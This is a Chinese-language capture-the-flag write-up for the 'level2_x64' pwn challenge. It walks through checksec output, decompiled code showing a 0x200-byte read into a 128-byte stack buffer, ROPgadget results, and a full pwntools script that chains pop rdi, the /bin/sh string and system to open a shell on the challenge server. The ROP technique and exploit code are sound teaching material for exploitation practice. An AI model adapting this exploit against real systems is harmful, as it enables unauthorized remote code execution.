分析

  • checksec
➜  pwn checksec --file=level2_x64    
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 68) Symbols No 0 1 level2_x64
  1. ida
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function();
return system("echo 'Hello World!'");
}

vulnerable_function函数:

ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF

system("echo Input:");
return read(0, buf, 0x200uLL);
}

read 最多读入 0x200 字节,存在溢出,查看 buf:

-0000000000000080 ; D/A/*   : change type (data/ascii/array)
  • 长度0x80

查看string:

  • system:0x040063E

    • 注意这里不是 string 的地址,而是调用 system 函数那条指令的地址
  • /bin/sh:0x0600A90

一眼就是ROP利用

利用

  • pop | ret
➜  pwn ROPgadget --binary level2_x64 --only 'pop|ret'
Gadgets information
============================================================
0x00000000004006ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop r14 ; pop r15 ; ret
0x00000000004006b2 : pop r15 ; ret
0x00000000004006ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400560 : pop rbp ; ret
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x00000000004006ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004a1 : ret
Unique gadgets found: 11
  • 0x00000000004004a1 : ret
  • 0x00000000004006b3 : pop rdi ; ret
pwndbg> info address main
Symbol "main" is at 0x400620 in a file compiled without debugging.
  • 0x400620 main

  • 代码

from pwn import *

# Challenge instance used in this write-up; values copied as given.
HOST, PORT = 'node5.buuoj.cn', 29141

conn = remote(HOST, PORT)

# Addresses taken from the binary. Fixed constants work here only because
# checksec reports "No PIE" (same load address every run) and "No canary
# found" (nothing protects the saved return address). The root cause is
# vulnerable_function() calling read(0, buf, 0x200) into a 0x80-byte stack
# buffer.
CALL_SYSTEM = 0x040063E   # the `call system` instruction, not a string address
BIN_SH_STR  = 0x0600A90   # the "/bin/sh" string
POP_RDI_RET = 0x04006b3   # ROPgadget: pop rdi ; ret

# 0x80 bytes fill the buffer, 8 more cover the saved rbp; what follows
# replaces the return address and the words above it.
padding = b'a' * (0x80 + 8)
chain = b''.join(p64(addr) for addr in (POP_RDI_RET, BIN_SH_STR, CALL_SYSTEM))

conn.sendline(padding + chain)
conn.interactive()